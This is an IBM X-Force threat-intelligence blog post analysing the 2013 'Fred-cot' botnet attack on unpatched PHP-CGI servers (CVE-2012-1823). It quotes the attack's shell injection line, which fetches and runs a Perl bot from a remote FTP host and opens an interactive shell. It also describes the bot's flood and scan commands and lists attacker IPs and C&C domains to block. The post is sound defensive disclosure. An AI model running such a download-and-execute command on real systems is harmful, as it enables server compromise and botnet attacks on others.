Light Dark
November 7, 2013 By Bryan Ivey 4 min read
Threat Intelligence
X-Force

As a new addition to our securityintelligence.com site we will begin to more regularly feature threat analysis from IBM’s Managed Security Services organization.  This team operates a 24/7 Security Operations Center (SOC) on behalf of thousands of clients globally. 

“Fred-Cot” overview

On Saturday, November 2, the IBM SOC detected an active attack attempting to infect several webservers to become part of a botnet.  IBM has identified this attack with the name “Fred-cot.”  “Fred-cot” was part of the FTP URL where the malware repository was located as well as part of the user name / password required to access the site.  The attack, which was active over the weekend but began to taper off earlier this week, is attempting to exploit an older vulnerability in PHP.   It works by attempting to connect to port 80 (web) on a targeted IP and injecting a shell command, which if successful, allows the malware to infect the victim’s system.

Details of the attack

The original attack appeared to originate from the IP address 72.26.194.138. This attack was first spotted by our threat analysts at 7am Eastern on Saturday, November 2nd. IBM is identifying this attack as “Fred-cot.” This address appears to be crawling IP address ranges attempting to connect to port 80 (web) on the targeted IP. Once a connection has been made, the attacking system attempts to inject a shell command. If this command is successfully run on the victim’s system, this malware would connect to 31.204.152.37 via FTP to download gj.exe. Once gj.exe had been downloaded and executed, the victim’s system will be connected to an IRC channel and will wait for further commands.

Site names mail.sermonshare.com, mail.radioworship.net, web1.sermon.net, and web02.sermmonshare.com all resolve to the 72.26.194.138 address. Activity to and from these site names should be considered suspicious at this time. Site names mijn-site.be, jinraforest.be, faker.eu, euroveiling.com, busimatch.com and six other hosts resolve to 31.204.152.37. Any activity to or from these sites should be considered especially suspicious. This IP is the repository for the malicious code.

We have seen the following shell injection code being used in this attack:

unset HISTFILE; unset HISTSIZE; uname -a; cd /tmp;wget ftp[COLON]//fredcot[COLON]fredcot123[AT]31.204.152.37/gj.exe;perl gj.exe;rm -rf gj.exe;w; id; /bin/sh -i’;x0a$daemo

83.170.75.200 appears to be the IP address of the IRC server the malware payload is using as a command and control (C&C) server.

We strongly recommend applying firewall rules to block any access to or from the 72.26.194.138, 31.204.152.37, and 83.170.75.200 addresses. Security teams should be aware that IP addresses specified could potentially change. Some anti-virus vendors can detect this malware and it is advisable to verify your software and definition files are up to date.

Malware analysis

This attack appears to be targeting an old vulnerability, CVE-2012-1823, in various versions of PHP paired with Apache web servers. This vulnerability was patched in 5.4.3 and 5.3.13 last year and we covered it in a number of assessments in the months of May and June. This vulnerability deals with an obscure portion of the CGI specification. Other web servers do not adhere to these specifications as Apache does.

The payload of the attack, gj.exe, contrary to implications the name implies, is not a Microsoft executable, it is a Perl script. There were four different variations of the script on the compromised site located at 31.204.152.37 that contained slight differences with the IRC server, ports used, IRC admins, and channels. There were also a number of files containing IP addresses, although their exact use is not known. Other tools located in the directory structure may have been used to generate the list of targets or possibly used in another form of attack.

Once infected and executing the malware, the victim’s system would become just another bot in the botnet. Based on the code, it appears the malware attempts to avoid detection by hiding itself as just another /usr/sbin/sshd process on the system. Connecting back to an IRC server, the victim would wait for commands sent to it through a private message. These commands could include

  • tcpflood used to send packets to a specific host / port combination for a specified time to generate a denial of service condition
  • udpflood used to send packets to a specific host with a designated packet size for a specified time to generate a denial of service condition
  • httpflood used to retrieve the index page of a specific host for a specified time to generate a denial of service condition
  • portscan used to scan a specified list of ports, including 21, 22, 25, and 80, as well as others
  • google used to search Google for references to sites with modules.php installed, possibly used to determine additional vulnerable sites
  • Also included in the code were a number of routines specific to IRC commands, such as connecting to a server, registering with a random nick (vn#### was the pattern used), joining channels, and exiting the IRC server. A subroutine in the malware might have been intended to allow the attacker to execute a remote command on the infected system.

Take action

We strongly suggest that our readers take the time to verify their PHP installations are current and are patched against this old vulnerability. This attack seems to indicate there may be systems facing the Internet that are not. As mentioned before, some anti-virus products do detect this malware. Users should ensure their anti-virus software and associated definition files are up to date. It is also advisable to block traffic to and from the hosts listed below at the perimeter firewalls. Please note, these are the IP addresses we have detected in this wave of attacks and could potentially change in the future.  Administrators should monitor their logs for any suspicious activity.

Current list of hosts that should be blocked due to malicious activity:

  • IPv4: 72.26.194.138 – Original attack vector
  • IPv4: 85.214.35.154 – Reverse shell destination
  • IPv4: 31.204.152.37 – FTP malware repository
  • IPv4: 83.170.75.200 – IRC server used for CnC
  • IPv4: 78.109.84.137 – IRC server used for CnC
  • IPv4: 50.57.71.234 – Additional attack vector
  • URI: army1.megaforce.co.il – IRC server used for CnC
  • URI: army2.megaforce.co.il – IRC server used for CnC
  • URI: army3.megaforce.co.il – IRC server used for CnC
  • URI: army4.megaforce.co.il – IRC server used for CnC
  • URI: army5.megaforce.co.il – IRC server used for CnC
  • URI: army6.megaforce.co.il – IRC server used for CnC
  • URI: army7.megaforce.co.il – IRC server used for CnC
  • URI: army8.megaforce.co.il – IRC server used for CnC
  • URI: army9.megaforce.co.il – IRC server used for CnC
Bryan Ivey
Cyber Threat and Intelligence Analyst, IBM X-Force

More from Threat Intelligence
November 12, 2024

Strela Stealer: Today’s invoice is tomorrow’s phish

12 min read - As of November 2024, IBM X-Force has tracked ongoing Hive0145 campaigns delivering Strela Stealer malware to victims throughout Europe - primarily Spain, Germany and Ukraine. The phishing emails used in these campaigns are real invoice notifications, which have been stolen through previously exfiltrated email credentials. Strela Stealer is designed to extract user credentials stored in Microsoft Outlook and Mozilla Thunderbird. During the past 18 months, the group tested various techniques to enhance its operation's effectiveness. Hive0145 is likely to be…

October 16, 2024

Hive0147 serving juicy Picanha with a side of Mekotio

17 min read - IBM X-Force tracks multiple threat actors operating within the flourishing Latin American (LATAM) threat landscape. X-Force has observed Hive0147 to be one of the most active threat groups operating in the region, targeting employee inboxes at scale, with a primary focus on phishing and malware distribution. After a 3-month break, Hive0147 returned in July with even larger campaign volumes, and the debut of a new malicious downloader X-Force named "Picanha,” likely under continued development, deploying the Mekotio banking trojan. Hive0147…

September 26, 2024

FYSA – Critical RCE Flaw in GNU-Linux Systems

2 min read - Summary The first of a series of blog posts has been published detailing a vulnerability in the Common Unix Printing System (CUPS), which purportedly allows attackers to gain remote access to UNIX-based systems. The vulnerability, which affects various UNIX-based operating systems, can be exploited by sending a specially crafted HTTP request to the CUPS service. Threat Topography Threat Type: Remote code execution vulnerability in CUPS service Industries Impacted: UNIX-based systems across various industries, including but not limited to, finance, healthcare,…

Topic updates

 Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research.
Subscribe today
© 2024 IBM Contact Privacy Terms of use Accessibility Cookie Preferences
Sponsored by si-icon-eightbarfeature